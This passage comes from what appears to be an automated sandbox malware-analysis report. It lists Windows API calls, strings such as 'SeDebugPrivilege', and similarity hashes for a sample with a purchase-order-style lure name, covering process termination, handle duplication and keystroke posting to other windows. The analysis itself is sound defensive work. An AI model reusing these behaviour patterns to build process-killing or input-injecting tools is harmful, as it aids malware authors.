                                                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0048F910), ref: 00478D5C
                                                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00478ED6
                                                                                • SysFreeString.OLEAUT32(?), ref: 00478F00
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                • String ID:
                                                                                • API String ID: 560350794-0
                                                                                • Opcode ID: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                                                                                • Instruction ID: 5de9ffb64ca5e15a2b50b30bc9937a924b2564530b5861c8322637ebb6f06415
                                                                                • Opcode Fuzzy Hash: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                                                                                • Instruction Fuzzy Hash: A4F12871A00109AFCB14DF94C888EEEB7B9FF49314F10846AF909AB251DB35AE46CB55
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0047F6B5
                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047F848
                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047F86C
                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047F8AC
                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047F8CE
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0047FA4A
                                                                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0047FA7C
                                                                                • CloseHandle.KERNEL32(?), ref: 0047FAAB
                                                                                • CloseHandle.KERNEL32(?), ref: 0047FB22
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                • String ID:
                                                                                • API String ID: 4090791747-0
                                                                                • Opcode ID: 09089f4999dafd9f94918a190b4690ca7b3ee09c0fd1a425bef097705c52c433
                                                                                • Instruction ID: 06b6fb47819207378a011b81351d7d70f99dbcb89b467e7706fbe8a6ff9703be
                                                                                • Opcode Fuzzy Hash: 09089f4999dafd9f94918a190b4690ca7b3ee09c0fd1a425bef097705c52c433
                                                                                • Instruction Fuzzy Hash: D8E194716042009FC714EF25C451BAA7BE1BF85314F14856EF8999B3A2DB38EC49CB5A
                                                                                APIs
                                                                                  • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
                                                                                  • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
                                                                                  • Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32
                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00464D40
                                                                                • _wcscmp.LIBCMT ref: 00464D5A
                                                                                • MoveFileW.KERNEL32(?,?), ref: 00464D75
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 793581249-0
                                                                                • Opcode ID: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
                                                                                • Instruction ID: 3e0d64ecfe06201b2d7f4e4ce82b19db3d94e317acadfd9fd6841a38a6d3c077
                                                                                • Opcode Fuzzy Hash: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
                                                                                • Instruction Fuzzy Hash: 1D5164B25083459BCB24EFA1D8819DF73ECAF84354F40092FB289D3151EE79A589C76B
                                                                                APIs
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004886FF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: InvalidateRect
                                                                                • String ID:
                                                                                • API String ID: 634782764-0
                                                                                • Opcode ID: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                                                                                • Instruction ID: 67c69bdd2abc2e43d0d58bc2ecba6baab6695951e18c15bee5b3ec72a7eaee37
                                                                                • Opcode Fuzzy Hash: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                                                                                • Instruction Fuzzy Hash: BE519530500244BEDB20BB298C89F5E7B64EB05724FA0492FF911E62E1DF79A990DB5D
                                                                                APIs
                                                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0043C2F7
                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0043C319
                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0043C331
                                                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0043C34F
                                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0043C370
                                                                                • DestroyIcon.USER32(00000000), ref: 0043C37F
                                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0043C39C
                                                                                • DestroyIcon.USER32(?), ref: 0043C3AB
                                                                                  • Part of subcall function 0048A4AF: DeleteObject.GDI32(00000000), ref: 0048A4E8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                • String ID:
                                                                                • API String ID: 2819616528-0
                                                                                • Opcode ID: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                                                                                • Instruction ID: 8b5e312d24aa0fc7293d55633b028b71e285ae3fa30838bdc618f7a4141ee9b3
                                                                                • Opcode Fuzzy Hash: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                                                                                • Instruction Fuzzy Hash: 9D516A74A00205AFDB20DF65CD85FAF3BB5EB58310F10452EF902A72D0D7B4A991DB68
                                                                                APIs
                                                                                  • Part of subcall function 0045A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0045A84C
                                                                                  • Part of subcall function 0045A82C: GetCurrentThreadId.KERNEL32 ref: 0045A853
                                                                                  • Part of subcall function 0045A82C: AttachThreadInput.USER32(00000000,?,00459683,?,00000001), ref: 0045A85A
                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 0045968E
                                                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004596AB
                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 004596AE
                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 004596B7
                                                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004596D5
                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004596D8
                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 004596E1
                                                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004596F8
                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004596FB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                • String ID:
                                                                                • API String ID: 2014098862-0
                                                                                • Opcode ID: 97659e6d0eeaf490ac976d3d5fe311f7ccd298156506907ffd454ad2a564656a
                                                                                • Instruction ID: 1862abde6b5ba1d27f2b77b23e96e8fddf5d6721de8ccd0207d4cd72f070cce3
                                                                                • Opcode Fuzzy Hash: 97659e6d0eeaf490ac976d3d5fe311f7ccd298156506907ffd454ad2a564656a
                                                                                • Instruction Fuzzy Hash: F011E571910618BEF6106F61DC49F6E3B1DDB4C755F100939F644AB0A1CAF25C15DBA8
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0045853C,00000B00,?,?), ref: 0045892A
                                                                                • HeapAlloc.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458931
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458946
                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,0045853C,00000B00,?,?), ref: 0045894E
                                                                                • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458951
                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458961
                                                                                • GetCurrentProcess.KERNEL32(0045853C,00000000,?,0045853C,00000B00,?,?), ref: 00458969
                                                                                • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 0045896C
                                                                                • CreateThread.KERNEL32(00000000,00000000,00458992,00000000,00000000,00000000), ref: 00458986
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                • String ID:
                                                                                • API String ID: 1957940570-0
                                                                                • Opcode ID: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                                                                                • Instruction ID: 349ed70c1d76ccaf0bdfd0abb61d7988567b7a63eab8a905bd57cb3f4c4245c0
                                                                                • Opcode Fuzzy Hash: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                                                                                • Instruction Fuzzy Hash: 4801BBB5240308FFE710ABA5DC8DF6B7BACEB89711F508825FA05DB1A1CA759C14CB24
                                                                                APIs
                                                                                  • Part of subcall function 0045710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
                                                                                  • Part of subcall function 0045710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
                                                                                  • Part of subcall function 0045710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
                                                                                  • Part of subcall function 0045710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00479806
                                                                                • _memset.LIBCMT ref: 00479813
                                                                                • _memset.LIBCMT ref: 00479956
                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00479982
                                                                                • CoTaskMemFree.OLE32(?), ref: 0047998D
                                                                                Strings
                                                                                • NULL Pointer assignment, xrefs: 004799DB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                • String ID: NULL Pointer assignment
                                                                                • API String ID: 1300414916-2785691316
                                                                                • Opcode ID: 45d3d11671b48f4c91a0fa55736b5ede04149e8acd56d59b25060feee5a3bfa2
                                                                                • Instruction ID: 344d97a8cecc5579365d94fc52d7d4a9bdae2fe77cb17e56d270d326fab8ac0d
                                                                                • Opcode Fuzzy Hash: 45d3d11671b48f4c91a0fa55736b5ede04149e8acd56d59b25060feee5a3bfa2
                                                                                • Instruction Fuzzy Hash: BD915CB1D00218EBDB10DFA5DC81EDEBBB9EF08314F10806AF519A7291EB755A44CFA5
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00486E24
                                                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 00486E38
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00486E52
                                                                                • _wcscat.LIBCMT ref: 00486EAD
                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 00486EC4
                                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00486EF2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window_wcscat
                                                                                • String ID: SysListView32
                                                                                • API String ID: 307300125-78025650
                                                                                • Opcode ID: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                                                                                • Instruction ID: cb01a20e413fb831c79b84d4e1a22deaf7a16da1e784ee9815b65cba95e2bd2f
                                                                                • Opcode Fuzzy Hash: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                                                                                • Instruction Fuzzy Hash: 6341A370A00308ABDB21AF64CC85BEF77F8EF08354F11082BF544A7291D6799D858B68
                                                                                APIs
                                                                                  • Part of subcall function 00463C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00463C7A
                                                                                  • Part of subcall function 00463C55: Process32FirstW.KERNEL32(00000000,?), ref: 00463C88
                                                                                  • Part of subcall function 00463C55: CloseHandle.KERNEL32(00000000), ref: 00463D52
                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9A4
                                                                                • GetLastError.KERNEL32 ref: 0047E9B7
                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9E6
                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0047EA63
                                                                                • GetLastError.KERNEL32(00000000), ref: 0047EA6E
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0047EAA3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                • String ID: SeDebugPrivilege
                                                                                • API String ID: 2533919879-2896544425
                                                                                • Opcode ID: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
                                                                                • Instruction ID: ee7027a858fb35c2998370541a0cb7821fbd3e1ab4d9769570fd7f32c35e06b7
                                                                                • Opcode Fuzzy Hash: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
                                                                                • Instruction Fuzzy Hash: E1419D712002009FDB10EF25DC95BAEB7A5AF44318F04856EF9069B3C2DB78AC09CB99
                                                                                APIs
                                                                                • LoadIconW.USER32(00000000,00007F03), ref: 00463033
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: IconLoad
                                                                                • String ID: blank$info$question$stop$warning
                                                                                • API String ID: 2457776203-404129466
                                                                                • Opcode ID: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                                                                                • Instruction ID: 1734436af2ca56e59899cd3bdf017f39c547290e8d4403808a282f24c331c6a5
                                                                                • Opcode Fuzzy Hash: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                                                                                • Instruction Fuzzy Hash: F211F631348386BAE7249E55DC42DAF679C9F15365B20002FF90066281FAFC5E4956AE
                                                                                APIs
                                                                                  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A460
                                                                                  • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A497
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A4C5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: SendString$_memmove
                                                                                • String ID: type cdaudio alias cd wait$ wait$close cd wait$set cd door
                                                                                • API String ID: 2279737902-2626315939
                                                                                • Opcode ID: 25991e495aa54eb53500ce1b036bd8f340046fa12330d61fcfdb58a0b1421220
                                                                                • Instruction ID: 3d8a09e445ca9db3d55ea58722ee79ad9098e4f2a1a367475f574b84354fba6f
                                                                                • Opcode Fuzzy Hash: 25991e495aa54eb53500ce1b036bd8f340046fa12330d61fcfdb58a0b1421220
                                                                                • Instruction Fuzzy Hash: 7F2153721182489ED700EB22CC91D6BB7A8EF9474CF50497FF08566091DE78AD09CB6B
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00464312
                                                                                • LoadStringW.USER32(00000000), ref: 00464319
                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0046432F
                                                                                • LoadStringW.USER32(00000000), ref: 00464336
                                                                                • _wprintf.LIBCMT ref: 0046435C
                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0046437A
                                                                                Strings
                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 00464357
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
